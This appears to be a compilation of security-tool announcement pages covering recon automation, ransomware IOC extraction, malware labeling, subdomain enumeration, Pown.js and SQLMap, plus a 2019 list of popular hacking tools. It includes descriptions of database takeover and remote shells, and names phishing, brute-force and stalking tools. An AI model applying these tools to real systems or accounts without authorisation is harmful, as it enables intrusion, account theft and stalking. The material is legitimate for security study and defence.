
nmapAutomator - Tool To Automate All Of The Process Of Recon/Enumeration


nmapAutomator
A script that you can run in the background!

Summary
The main goal of this script is to automate the whole recon/enumeration process that is run every time, so that attention can go to real pen testing instead.
This will ensure two things:
1) nmap scans are automated. 2) Some recon is always running in the background.
Once you find the initial ports in around 10 seconds, you can start manually looking into those ports and let the rest run in the background with no interaction from your side whatsoever.

Features:
  1. Quick: Shows all open ports quickly (~15 seconds)
  2. Basic: Runs Quick Scan, then runs a more thorough scan on found ports (~5 minutes)
  3. UDP: Runs "Basic" on UDP ports (~5 minutes)
  4. Full: Runs a full range port scan, then runs a thorough scan on new ports (~5-10 minutes)
  5. Vulns: Runs CVE scan and nmap Vulns scan on all found ports (~5-15 minutes)
  6. Recon: Runs the "Basic" scan (if not yet run), then suggests recon commands (e.g. gobuster, nikto, smbmap) based on the found ports, then prompts to run them automatically
  7. All: Runs all the scans consecutively (~20-30 minutes)
I tried to make the script as efficient as possible, so that you get the results as fast as possible without duplicating any work.

Requirements:
Required: Gobuster v3.0 or higher, as it is not backward compatible.
You can update gobuster on Kali using:
apt-get update
apt-get install gobuster --only-upgrade
Recommended: the nmap vulners script (for the CVE scan)
https://github.com/vulnersCom/nmap-vulners

Examples of use:
./nmapAutomator.sh
./nmapAutomator.sh 10.1.1.1 All
./nmapAutomator.sh 10.1.1.1 Basic
./nmapAutomator.sh 10.1.1.1 Recon
If you want to use it from anywhere on the system, create a symlink with:
ln -s /PATH-TO-FOLDER/nmapAutomator.sh /usr/local/bin/



RansomCoin - A DFIR Tool To Extract Cryptocoin Addresses And Other Indicators Of Compromise From Binaries


RansomCoin extracts metadata and hardcoded Indicators of Compromise from ransomware in a scalable, efficient way, with Cuckoo integrations. Ideally it is run during Cuckoo dynamic analysis, but it can also be used for static analysis of large collections of ransomware. It is designed to be fast, with a low false-positive rate for cryptocurrency addresses and limited false positives for emails, URLs, onions and domains (which are hard to match perfectly).
In short, this is fast and easy initial triage if you only want monetisation vectors.

Installation instructions
Please ensure you have Python3 installed.

In a Linux Virtual Machine
It is advisable to download and install a virtualizer such as VirtualBox. Install your desired Linux virtual machine (e.g. Lubuntu, Kali Linux), then follow the instructions below.
From the tools folder:
sudo apt-get install build-essential libpoppler-cpp-dev pkg-config python-dev python3-tlsh
python3 -m pip install -r requirements.txt
Note: If you get an error saying No module named pip, try running
sudo apt-get install python3-pip

Usage instructions
A tutorial video is available: https://youtu.be/3pUDh5HvqVI
The following commands can be run from the "Tools" folder to analyse malware samples located in this directory. This will run the code across all files in the directory and provide feedback on the estimated time to completion via TQDM. You will need write access for a file called Ransomware.csv in the directory you are working in (it contains the results). It should be possible to run the code across read-only malware files, so only Ransomware.csv needs write access.

Coinlector.py
After running coinlector.py, the results are output to a file in the same directory called Ransomware.csv
python3 coinlector.py
View the results by running
less Ransomware.csv


Currently we are testing for:
  • Bitcoin Addresses (BTC)
  • Bitcoin Cash Addresses (BCH)
  • Monero Addresses (XMR)
  • Bitcoin Private Keys
  • Ethereum addresses (ETH)
  • Ripple addresses (XRP)
  • LTC addresses (LTC)
  • DOGECOIN addresses (DOGE)
  • NEO addresses (NEO)
  • DASH addresses (DASH)
  • Domains (Address)
  • Email Addresses (Email)
  • Onion Addresses (Address)
View URLs, email addresses, and cryptocurrency addresses by running the following grep commands.
less Ransomware.csv | grep URL
less Ransomware.csv | grep Email
less Ransomware.csv | grep Address
Grep for Monero addresses by running
less Ransomware.csv | grep XMR
The same command can be used to search for other cryptocurrencies using the abbreviations in the list above.
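The page does not show how coinlector.py keeps false positives low for cryptocurrency addresses. The block below is an added example (not RansomCoin's code) of the standard technique: match Bitcoin-address-shaped strings with a regex, then keep only those that pass Base58Check (version byte plus double-SHA256 checksum). The embedded "binary" is a constructed byte string; the first address in it is the well-known genesis-block address, the second is the same address with its last character changed.

```python
import hashlib
import re

# Bitcoin's Base58 alphabet (no 0, O, I or l, which are easy to confuse).
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
B58_INDEX = {c: i for i, c in enumerate(B58_ALPHABET)}
B58_CLASS = "[1-9A-HJ-NP-Za-km-z]"

# Candidate legacy (P2PKH, '1...') and P2SH ('3...') addresses: 26-35 Base58 chars
# not glued to other Base58 characters, so substrings of longer blobs are skipped.
BTC_CANDIDATE_RE = re.compile(
    (r"(?<!%s)[13]%s{25,34}(?!%s)" % (B58_CLASS, B58_CLASS, B58_CLASS)).encode()
)

# Constructed sample "binary": a ransom-note fragment with one real address, the
# same address with a corrupted last character, and Base58-looking noise.
SAMPLE = (
    b"\x00\x00MZ\x90\x00Your files are encrypted. Send 0.5 BTC to "
    b"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa within 72 hours.\x00"
    b"backup key: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNb\x00"
    b"noise 1ABCDEFGHJKLMNPQRSTUVWXYZabcdefghjk\x00"
)


def b58decode(s):
    """Decode a Base58 string to bytes; each leading '1' becomes a leading zero byte."""
    n = 0
    for c in s:
        n = n * 58 + B58_INDEX[c]          # KeyError on non-Base58 characters
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + body


def is_valid_btc_address(addr):
    """Base58Check: 1 version byte + 20-byte hash + 4-byte double-SHA256 checksum."""
    try:
        raw = b58decode(addr)
    except KeyError:
        return False
    if len(raw) != 25 or raw[0] not in (0x00, 0x05):   # mainnet P2PKH / P2SH versions
        return False
    payload, checksum = raw[:21], raw[21:]
    digest = hashlib.sha256(hashlib.sha256(payload).digest()).digest()
    return digest[:4] == checksum


def extract_candidates(data):
    """Regex-only matches, i.e. what a scanner reports without the checksum step."""
    return [m.group().decode("ascii") for m in BTC_CANDIDATE_RE.finditer(data)]


def extract_btc_addresses(data):
    """Unique, checksum-valid Bitcoin addresses found in a byte blob."""
    found = []
    for candidate in extract_candidates(data):
        if is_valid_btc_address(candidate) and candidate not in found:
            found.append(candidate)
    return found


if __name__ == "__main__":
    print("regex candidates:", extract_candidates(SAMPLE))
    print("checksum-valid  :", extract_btc_addresses(SAMPLE))
```

Only one of the three regex candidates survives the checksum, which is the kind of filtering that keeps a CSV of extracted addresses usable for triage.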

Tempuscoin.py
tempuscoin.py outputs a list of timestamped ransom transactions. The file TemporalRansoms.csv is created, showing the sending and receiving Bitcoin addresses, the amount in BTC and its equivalent value in EUR and USD at the time of the transaction.
python3 tempuscoin.py
View the results by running
less TemporalRansoms.csv


Eventcoin.py
This code will probably need to be altered to work with your own MISP instance. It uses PyMISP to create events from the Ransomware.csv file; groups of events share the same name. The default is to create unpublished events and then add details by hand before publishing. YMMV.


Pown.js - A Security Testing An Exploitation Toolkit Built On Top Of Node.js And NPM


Pown.js is a security testing and exploitation toolkit built on top of Node.js and NPM. Unlike traditional security tools like Metasploit, Pown.js considers frameworks an anti-pattern. Each module in Pown is therefore a standalone NPM module, allowing a greater degree of reuse and flexibility. Creating new modules is a matter of publishing to NPM and tagging them with the correct tags. The rest is handled automatically.

Quickstart
Install Pown.js globally with npm or yarn.
$ npm install -g pown@latest

Usage
pown [options] <command> [command options]

Commands:
pown modules <command> Module manager [aliases: module, m]
pown update [options] Update global installation of pown [aliases: upgrade, up]
pown buster <command> Multi-service bruteforce discovery tool [aliases: bust]
pown credits [options] list contributors and credits
pown dicts [options] <search> Assorted Dictionaries
pown duct <command> Side-channel attack enabler [aliases: ducting, d]
pown figlet <text> Generate figlet
pown preferences <command> Preferences [aliases: prefs]
pown proxy [options] [command] HTTP proxy
pown recon <command> Target recon
pown script [file |script] [args...] Simple scripting engine for automating pown commands.
pown shell [options] Simple shell
pown whoarethey <accounts...> find social networking accounts and more

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown modules
pown modules <command>

Module manager

Commands:
pown modules install <modules...> Install modules
pown modules uninstall <modules...> Uninstall modules
pown modules update [modules...] Update modules
pown modules list List install modules
pown modules search <terms...> Search modules

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown update
pown update [options]

Update global installation of pown

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown buster
pown buster <command>

Multi-service bruteforce discovery tool

Commands:
pown buster web [options] <url> Web file and directory bruteforcer (a.k.a dirbuster)
pown buster email [options] <domain> Email bruteforce discovery tool (via smtp) [aliases: emails]

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown credits
pown credits [options]

list contributors and credits

Options:
--version Show version number [boolean]
--help Show help [boolean]
--only, -o Only Pown.js contributors [boolean]

pown dicts
pown dicts [options] <search>

Assorted Dictionaries

Options:
--version Show version number [boolean]
--help Show help [boolean]
--download, -d Download found dictionaries [boolean] [default: false]
--regex, -r Search with regex [boolean] [default: false]

pown duct
pown duct <command>

Side-channel attack enabler

Commands:
pown duct dns DNS ducting

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown figlet
pown figlet <text>

Generate figlet

Options:
--version Show version number [boolean]
--help Show help [boolean]
--font, -f FIGlet font to use [string] [default: "Standard"]
--fg Foreground color [choices: "default", "black", "red", "green", "yellow", "blue", "magenta", "cyan", "white", "gray", "grey"] [default: "default"]
--bg Background color [choices: "default", "black", "red", "green", "yellow", "blue", "magenta", "cyan", "white"] [default: "default"]
--bold Make it bold [boolean] [default: false]

pown preferences
pown preferences <command>

Preferences

Commands:
pown preferences get <tool> [name] get preferences
pown preferences set <tool> <name> <value> set preferences

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown proxy
pown proxy [options] [command]

HTTP proxy

Options:
--version Show version number [boolean]
--help Show help [boolean]
--log, -l Log requests and responses [boolean] [default: false]
--host, -h Host to listen to [string] [default: "0.0.0.0"]
--port, -p Port to listen to [number] [default: 8080]
--text, -t Start with text ui [boolean] [default: false]
--ws-client, -c Connect to web socket [string] [default: ""]
--ws-server, -s Forward on web socket [boolean] [default: false]
--ws-host Web socket server host [string] [default: "0.0.0.0"]
--ws-port Web socket server port [number] [default: 9090]
--ws-app Open app [string] [choices: "", "httpview"] [default: ""]
--certs-dir Directory for the certificates [string] [default: "/home/ec2-user/.pown/proxy/certs"]
--server-key-length Default key length for certificates [number] [default: 1024]
--default-ca-common-name The CA common name [string] [default: "Pown.js Proxy"]

pown recon
pown recon <command>

Target recon

Commands:
pown recon transform <transform> Perform inline transformation [aliases: t]
pown recon select <selectors...> Select nodes [aliases: s]
pown recon add <nodes...> Add nodes [aliases: a]
pown recon remove <selectors...> Remove nodes [aliases: r]
pown recon merge <files...> Perform a merge between at least two recon files [aliases: m]
pown recon diff <fileA> <fileB> Perform a diff between two recon files [aliases: d]
pown recon group <name> <selectors...> Group nodes [aliases: g]
pown recon ungroup <selectors...> Ungroup nodes [aliases: u]
pown recon import <file> Import file [aliases: i]
pown recon export <file> Export to file [aliases: e]

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown script
pown script [file|script] [args...]

Simple scripting engine for automating pown commands.

Options:
--version Show version number [boolean]
--help Show help [boolean]
--command, -c Evaluate inline commands [boolean] [default: false]
--exit, -e Exit immediately [boolean] [default: false]
--expand, -x Expand command [boolean] [default: false]
--skip, -s Skip number of lines [number] [default: 0]

pown shell
pown shell [options]

Simple shell

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown whoarethey
pown whoarethey <accounts...>

find social networking accounts and more

Options:
--version Show version number [boolean]
--help Show help [boolean]

Modules
Pown.js comes with several builtin modules for convenience. Additional modules can be installed directly from the NPM registry using the pown modules command. Optional modules are installed in the current user's home folder under .pown/modules.


Top 20 Most Popular Hacking Tools in 2019


As last year, this year we have made a ranking of the most popular tools between January and December 2019.

The tools cover OSINT, information gathering, Android hacking tools, automation tools and phishing, among other topics.

Without going into further detail, we have prepared a useful list of the most popular tools on KitPloit in 2019:

  1. Hijacker - All-in-One Wi-Fi Cracking Tools for Android

  2. Findomain - The Fastest And Cross-Platform Subdomain Enumerator

  3. EagleEye - Stalk Your Friends. Find Their Instagram, FB And Twitter Profiles Using Image Recognition And Reverse Image Search

  4. ANDRAX - Penetration Testing on Android

  5. CQTools - The New Ultimate Windows Hacking Toolkit

  6. Sampler - A Tool For Shell Commands Execution, Visualization And Alerting (Configured With A Simple YAML File)

  7. LOIC (Low Orbit Ion Cannon) - A network stress testing application

  8. EasySploit - Metasploit Automation (EASIER And FASTER Than EVER)

  9. ScanQLi - Scanner To Detect SQL Injection Vulnerabilities

  10. SQLMap - Automatic SQL Injection And Database Takeover Tool

  11. OKadminFinder - Admin Panel Finder / Admin Login Page Finder

  12. Shellphish - Phishing Tool For 18 Social Media (Instagram, Facebook, Snapchat, Github, Twitter...)

  13. DNS-Shell - An Interactive Shell Over DNS Channel

  14. QRLJacker - QRLJacking Exploitation Framework

  15. PhoneSploit - Using Open Adb Ports We Can Exploit A Device

  16. SocialBox - A Bruteforce Attack Framework (Facebook, Gmail, Instagram, Twitter)

  17. Instainsane - Multi-threaded Instagram Brute Forcer

  18. Tool-X - A Kali Linux Hacking Tool Installer

  19. Hacktronian - All In One Hacking Tool For Linux & Android

  20. Ultimate Facebook Scraper - A Bot Which Scrapes Almost Everything About A Facebook User's Profile Including All Public Posts/Statuses Available On The User's Timeline, Uploaded Photos, Tagged Photos, Videos, Friends List And Their Profile Photos


Happy New Year wishes the KitPloit team!


Turbolist3r - Subdomain Enumeration Tool With Analysis Features For Discovered Domains


Turbolist3r is a fork of the sublist3r subdomain discovery tool. In addition to the original OSINT capabilities of sublist3r, turbolist3r automates some analysis of the results, with a focus on subdomain takeover.
Turbolist3r queries public DNS servers for each discovered subdomain. If the subdomain exists (i.e. the resolver replied with an address), the answer is categorized as a CNAME or an A record. By examining A records, it is possible to discover potential penetration-testing targets for a given domain. Likewise, looking for subdomain takeovers is simple: view the discovered CNAME records and investigate any that point to applicable cloud services.
Please do not use for illegal purposes.


Usage
Short Form  Long Form     Description
-d          --domain      Domain name to enumerate subdomains of
-b          --bruteforce  Enable the subbrute bruteforce module
-p          --ports       Scan the found subdomains against specific TCP ports
-v          --verbose     Enable verbose mode and display results in real time
-t          --threads     Number of threads to use for subbrute bruteforce
-e          --engines     Specify a comma-separated list of search engines
-o          --output      Save discovered domain names to the specified text file
-h          --help        Show the help message and exit
-a          --analyze     Do reverse DNS analysis and output results
(none)      --saverdns    Save reverse DNS analysis to the specified file
(none)      --inputfile   Read domains from the specified file and use them for analysis
(none)      --debug       Print debug information during the analysis module (-a). Prints mostly raw DNS data; familiarity with the dig Linux DNS utility and its output helps in interpreting the debug output
-r          --resolvers   File with DNS servers to populate as resolvers. The file must have one server IP address per line, and only IP addresses are accepted

Examples
  • To list all the basic options and switches use -h switch:
python turbolist3r.py -h
  • To enumerate subdomains of a specific domain, perform advanced analysis, and save the analysis to a file:
python turbolist3r.py -d example.com -a --saverdns analysis_file.txt
  • Read subdomains from a file and perform advanced analysis on them:
python turbolist3r.py -d example.com -a --inputfile subdomains.txt
  • Using -r to populate DNS resolvers from a file (resolvers used with -a analysis module):
python turbolist3r.py -d example.com -a --inputfile subdomains.txt -r dns_servers.txt
  • To enumerate subdomains of specific domain:
python turbolist3r.py -d example.com
  • To enumerate subdomains of specific domain and save discovered subdomains to a file:
python turbolist3r.py -d example.com -o example_hosts.txt
  • To enumerate subdomains of specific domain and show the results in realtime:
python turbolist3r.py -v -d example.com
  • To enumerate subdomains and enable the bruteforce module:
python turbolist3r.py -b -d example.com
  • To enumerate subdomains and use specific engines, such as the Google, Yahoo and VirusTotal engines:
python turbolist3r.py -e google,yahoo,virustotal -d example.com

Dependencies:
Turbolist3r depends on the dnslib, requests and argparse Python modules. The subbrute module is required for bruteforce capability, but Turbolist3r should run without it as long as you don't invoke bruteforce. Submit a PR or contact me if you have issues.

dnslib Module
The dnslib module can be downloaded from https://bitbucket.org/paulc/dnslib/ or installed on many systems using:
pip install dnslib

requests Module
  • Install for Ubuntu/Debian:
sudo apt-get install python-requests
  • Install for Centos/Redhat:
sudo yum install python-requests
  • Install using pip on Linux:
sudo pip install requests

argparse Module
  • Install for Ubuntu/Debian:
sudo apt-get install python-argparse
  • Install for Centos/Redhat:
sudo yum install python-argparse
  • Install using pip:
sudo pip install argparse

Credits
  • aboul3la - The creator of Sublist3r; turbolist3r adds some features but is otherwise a near clone of sublist3r.
  • TheRook - The bruteforce module was based on his script subbrute.
  • bitquark - Subbrute's wordlist was based on his research dnspop.

Thanks
  • Thank you to aboul3la for releasing sublist3r, an incredible subdomain discovery tool!


SQLMap v1.4 - Automatic SQL Injection And Database Takeover Tool


SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, through data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per the user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where the relevant column names contain strings like name and pass.
  • Support to download and upload any file from the database server's underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server's underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server's underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per the user's choice.
  • Support for database process user privilege escalation via Metasploit's Meterpreter getsystem command.

Installation
You can download the latest tarball by clicking here or latest zipball by clicking here.
Preferably, you can download sqlmap by cloning the Git repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

Usage
To get a list of basic options and switches use:
python sqlmap.py -h
To get a list of all options and switches use:
python sqlmap.py -hh
You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user's manual.


AVCLASS++ - Yet Another Massive Malware Labeling Tool


AVCLASS++ is an appealing complement to AVCLASS [1], a state-of-the-art malware labeling tool.

Overview
AVCLASS++ is a labeling tool for creating a malware dataset. Addressing malware threats requires constant effort to create and maintain datasets, and labeling malware samples in particular is a vital part of shepherding a dataset. AVCLASS, a tool developed for this purpose, takes VirusTotal reports as input and returns labels that aggregate the scan results of multiple anti-viruses. AVCLASS++ now ships with brand-new capabilities!
In a nutshell, AVCLASS++ enables the following operation:
  • Input:
    • VirusTotal report(s)
    • Malware binar(y|ies) (optional)
  • Output:
    • Malware label(s) (family name)

Features
AVCLASS++ is developed to free you from worrying about which families malware samples belong to. The salient features of AVCLASS++ are as follows:
  • Automatic. AVCLASS++ removes manual analysis limitations on the size of the input dataset.
  • Vendor-agnostic. AVCLASS++ operates on the labels of any available set of AV engines, which can vary from sample to sample.
  • Cross-platform. AVCLASS++ can be used for any platforms supported by AV engines, e.g., Windows or Android malware.
  • Does not require executables. AV labels can be obtained from online services like VirusTotal using a sample's hash, even when the executable is not available. Yet AVCLASS++ also has the potential to improve label accuracy when an executable is available.
  • Quantified accuracy. The original AVCLASS was evaluated [1] on five publicly available malware datasets with ground truth. AVCLASS++ is further tuned to perform under adverse conditions.
  • Open source. We are happy to release AVCLASS++ to the community. Prithee, use it for the further development of prompt security operation and reproducible security research!

Step Forward
The following limitation was pointed out in the original AVCLASS paper:
The main limitation of AVClass is that its output depends on the input AV labels. It tries to compensate for the noise on those labels, but cannot identify the family of a sample if AV engines do not provide non-generic family names to that sample. In particular, it cannot label samples if at least 2 AV engines do not agree on a non-generic family name. Results on 8 million samples showed that AVClass could label 81% of the samples. In other words, it could not label 19% of the samples because their labels contained only generic tokens.
We have organized such pitfalls into two factors.
  • First, AVCLASS is prone to fail to label samples that have just been posted to VirusTotal, because only a few anti-viruses give labels to such samples. Such a sample will be labeled SINGLETON. An inconvenient truth: when we provided AVCLASS with 20,000 VirusTotal reports, half of them were labeled SINGLETON.
  • Second, AVCLASS cannot determine whether a label is randomly generated (as with the domain generation algorithms of malware) or not. Some anti-viruses that VirusTotal started working with after AVCLASS was released emit DGA-like labels, resulting in biased labels.
Because of these, we were forced into a lot of manual, tedious intervention in malware labeling, or else had to drop samples with inconsistent labels from the dataset, since there was no alternative.
For these reasons, AVCLASS++ is designed to address these drawbacks by arming itself with the following:
  • Label propagation. AVCLASS++ accepts not only VirusTotal reports but also the binary executable files of samples as input, and measures the similarity between them, thereby propagating [3] a malware label to the ones labeled SINGLETON. Here, AVCLASS++ exploits hashed features from various perspectives [4], e.g., byte histogram, printable strings, file size, PE headers, sections, imports, exports, and more! It then calculates the similarity of the samples by deriving an affinity matrix and re-labels SINGLETONs as a result of the propagation from a similar sample. This reduces the number of SINGLETONs.
  • DGA detection. AVCLASS++ determines whether labels were generated by a DGA and removes such labels from the candidates. This technique is based on the meaningful characters ratio and the $N$-gram normality score [5]. In other words, AVCLASS++ verifies that the label presented by an AV is meaningful and easy to pronounce, and from that determines whether the label is DGA-generated. This enables unbiased labeling.
Besides, unlike AVCLASS, AVCLASS++ is Python 3 compatible!

How To Use

Installation
git clone git@github.com:malrev/avclassplusplus.git
./setup.sh

Labeling
The labeler takes as input a JSON file with the AV labels of malware samples (-vt or -lb switches), a file with generic tokens (-gen switch), and a file with aliases (-alias switch). It outputs the most likely family name for each sample. If you do not provide alias or generic tokens files, the default ones in the data folder are used.
python avclass_labeler.py -lb data/malheurReference_lb.json -v > malheurReference.labels
The above command labels the samples whose AV labels are in the data/malheurReference_lb.json file. It prints the results to stdout, which we redirect to the malheurReference.labels file. The output looks like this:
aca2d12934935b070df8f50e06a20539 adrotator
67d15459e1f85898851148511c86d88d adultbrowser
which means sample aca2d12934935b070df8f50e06a20539 is most likely from the adrotator family and 67d15459e1f85898851148511c86d88d from the adultbrowser family.
The verbose (-v) switch makes it output an extra malheurReference_lb.verbose file with all families extracted for each sample ranked by the number of AV engines that use that family. The file looks like this:
aca2d12934935b070df8f50e06a20539  [('adrotator', 8), ('zlob', 2)]
ee90a64fcfaa54a314a7b5bfe9b57357 [('swizzor', 19)]
f465a2c1b852373c72a1ccd161fbe94c SINGLETON:f465a2c1b852373c72a1ccd161fbe94c
which means that for sample aca2d12934935b070df8f50e06a20539 there are 8 AV engines assigning adrotator as the family and another 2 assigning zlob. Thus, adrotator is the most likely family. On the other hand, for ee90a64fcfaa54a314a7b5bfe9b57357 there are 19 AV engines assigning swizzor as the family, and no other family was found. The last line means that for sample f465a2c1b852373c72a1ccd161fbe94c no family name was found in the AV labels. Thus, the sample is placed by itself in a singleton cluster, with the name of the cluster being the sample's hash.
Note that the sum of the number of AV engines may not equal the number of AV engines with a label for that sample in the input file, because the labels of some AV engines may only include generic tokens that are removed by AVCLASS++. In such a case, the propagator described later comes to the rescue.

Input JSON Format
AVCLASS++ supports two input JSON formats:
  1. VirusTotal JSON reports (-vt file), where each line in file should be the full JSON of a VirusTotal report as fetched through the VirusTotal API.
  2. Simplified JSON (-lb file), where each line in file should be a JSON with (at least) these fields: {md5, sha1, sha256, scan_date, av_labels}. There is an example of such an input file in data/malheurReference_lb.json. This option works well if you want to use label candidates from a source other than VirusTotal or from a self-made engine.
AVCLASS++ can handle multiple input files putting the results in the same output files (if you want results in separate files, process each input file separately).
You can provide the -vt and -lb input options multiple times.
python avclass_labeler.py -vt <file1> -vt <file2> > all.labels
python avclass_labeler.py -lb <file1> -lb <file2> > all.labels
There are also -vtdir and -lbdir options that can be used to provide an input directory where all files are VT (-vtdir) or simplified (-lbdir) JSON reports.
python avclass_labeler.py -vtdir <directory> > all.labels
You can also combine -vt with -vtdir and -lb with -lbdir, but you cannot combine input files of different format. Thus, this command works:
python avclass_labeler.py -vt <file> -vtdir <directory> > all.labels
But, this one throws an error:
python avclass_labeler.py -vt <file1> -lb <file2> > all.labels
At this point you have read the most important information on how to use AVCLASS++. The following sections describe optional steps.

Label Propagation
When a sample has just been uploaded to VirusTotal, the original AVCLASS often gives you a SINGLETON label because of the lack of AV signatures. In such a case, we usually disassemble and execute the sample, compare the results to past ones, and then give it the appropriate label.
Therefore, we introduce a function that automates this task. AVCLASS++ retrieves and compares the byte histogram, printable strings, file size, PE headers, sections, imports, exports, and so on from the given executable files. Then it gives SINGLETONs the label of similar samples. An affinity matrix is derived to compute the similarities. For label propagation, the label propagation algorithm [3] is used as is.
To use this function, run the following command:
python avclass_propagator.py -labels <file1> -sampledir <directory> -results <file2>
The input file passed with -labels must be created in advance by avclass_labeler.py. The directory passed with -sampledir must contain samples whose hash values are contained in the labels file. The -results option is optional; by default, the propagator creates a _pr.labels file based on the .labels file passed as an argument. AVCLASS++ overwrites only SINGLETON labels with predicted labels by default. You can overwrite all original labels with predicted labels by enabling the -force option. In addition, you can automatically optimize hyperparameter values by enabling -opt.
python avclass_propagator.py -labels input.labels -sampledir samples -results output.labels -opt
This feature runs contrary to the original AVCLASS principle of "does not require executables", but it is really helpful in practice.

DGA Detection
AVs such as BitDefender, AegisLab, Emsisoft, eScan, GData, Ad-Aware, MAX, K7Antivirus, K7GW, Cybereason, and Cyren will output pseudo-randomly generated labels in a similar vein as DGA of malware. You can see an example at VirusTotal: f315be41d9765d69ad60f0b4d29e4300. This leads the original AVCLASS would be confused.
Therefore, we present a function that removes labels that appear to be generated by a DGA. To this end, we employ the following heuristics [5]:
  • Meaningful characters ratio. This score indicates what fraction of a label consists of meaningful words (the higher the better). Specifically, we split the label string $p$ into $k$ meaningful subwords $w_i$ with $|w_i| \geq 3$ and compute $R(p) = \max \frac{\sum_{i=1}^{k} |w_i|}{|p|}$, where the maximum is taken over all such splits.
  • $n$-gram normality score. This score indicates how easy the words within a label are to pronounce (the higher the better). Specifically, we take every $n$-gram $t$ of the label string $p$, count its occurrences $count(t)$ in the dictionary, and average them: $S_n(p) = \frac{\sum_{t \in \text{n-grams}(p)} count(t)}{|p| - n + 1}$, where $n$ is given. From our experience, we highly recommend setting $n > 3$.
The key insight behind these scores is that a proper label contains a string that is meaningful and easy to pronounce. AVCLASS++ calculates the harmonic mean of the two scores and decides, based on a threshold, whether the label was generated by a DGA. This function is enabled by default, but you can configure it with:
python avclass_labeler.py -vtdir <directory> -dgadetect <dictionary> <n> <threshold> > all.labels
An example is below:
python avclass_labeler.py -vtdir <directory> -dgadetect data/top10000en.txt 4 2 > all.labels
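The two heuristics above worked through in code, as an added example that is not AVCLASS++'s own implementation: $R(p)$ is computed exactly by dynamic programming over all splits into dictionary subwords, $S_n(p)$ averages dictionary $n$-gram counts, and the harmonic mean is compared with a threshold. The mini-dictionary, the labels scored and the threshold of 0.3 are constructed for this example; the real tool takes a word list such as data/top10000en.txt, and the threshold scale depends on the dictionary used.

```python
"""Added example, not AVCLASS++ code: score an AV label with the meaningful characters
ratio R(p) and the n-gram normality S_n(p), combine them with a harmonic mean and flag
DGA-looking labels that score below a threshold."""
from collections import Counter

# Constructed mini-dictionary of "meaningful" words that commonly occur in AV labels.
DICTIONARY = {
    "trojan", "generic", "downloader", "adware", "agent", "crypt", "dropper", "inject",
    "ransom", "locker", "virus", "backdoor", "spyware", "malware", "worm", "rootkit",
    "packed", "variant", "casino", "virut", "allaple", "zbot", "banker", "fake", "alert",
}


def build_ngram_counts(dictionary, n):
    """count(t) for every n-gram t occurring in the dictionary words."""
    counts = Counter()
    for word in dictionary:
        for i in range(len(word) - n + 1):
            counts[word[i:i + n]] += 1
    return counts


def meaningful_chars_ratio(label, dictionary, min_len=3):
    """R(p): largest share of |p| coverable by non-overlapping dictionary subwords w_i
    with |w_i| >= min_len. best[i] holds the best coverage of the prefix p[:i], so the
    maximum over all possible splits is exact."""
    p = label.lower()
    n = len(p)
    if n == 0:
        return 0.0
    best = [0] * (n + 1)
    for i in range(1, n + 1):
        best[i] = best[i - 1]                     # leave character i-1 uncovered
        for j in range(0, i - min_len + 1):       # subword p[j:i] has length >= min_len
            if p[j:i] in dictionary:
                best[i] = max(best[i], best[j] + (i - j))
    return best[n] / n


def ngram_normality(label, ngram_counts, n):
    """S_n(p): mean dictionary frequency of the |p|-n+1 n-grams of the label."""
    p = label.lower()
    grams = [p[i:i + n] for i in range(len(p) - n + 1)]
    if not grams:
        return 0.0
    return sum(ngram_counts[g] for g in grams) / len(grams)


def label_score(label, dictionary, ngram_counts, n):
    """Harmonic mean of R(p) and S_n(p); zero as soon as either heuristic is zero."""
    r = meaningful_chars_ratio(label, dictionary)
    s = ngram_normality(label, ngram_counts, n)
    return 0.0 if r + s == 0 else 2 * r * s / (r + s)


def is_dga_like(label, dictionary, ngram_counts, n=4, threshold=0.3):
    """True when the label looks pseudo-randomly generated (score below the threshold).
    n=4 follows the n > 3 recommendation above; the threshold is this example's own."""
    return label_score(label, dictionary, ngram_counts, n) < threshold


NGRAM_COUNTS = build_ngram_counts(DICTIONARY, 4)

if __name__ == "__main__":
    for lbl in ["trojandropper", "agentb", "xqzvkjwpt", "qwpzxkvb"]:   # constructed labels
        print(lbl, round(label_score(lbl, DICTIONARY, NGRAM_COUNTS, 4), 3),
              "DGA-like" if is_dga_like(lbl, DICTIONARY, NGRAM_COUNTS) else "ok")
```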

Family Ranking
AVCLASS++ has a -fam switch to output a file with a ranking of the families assigned to the input samples.
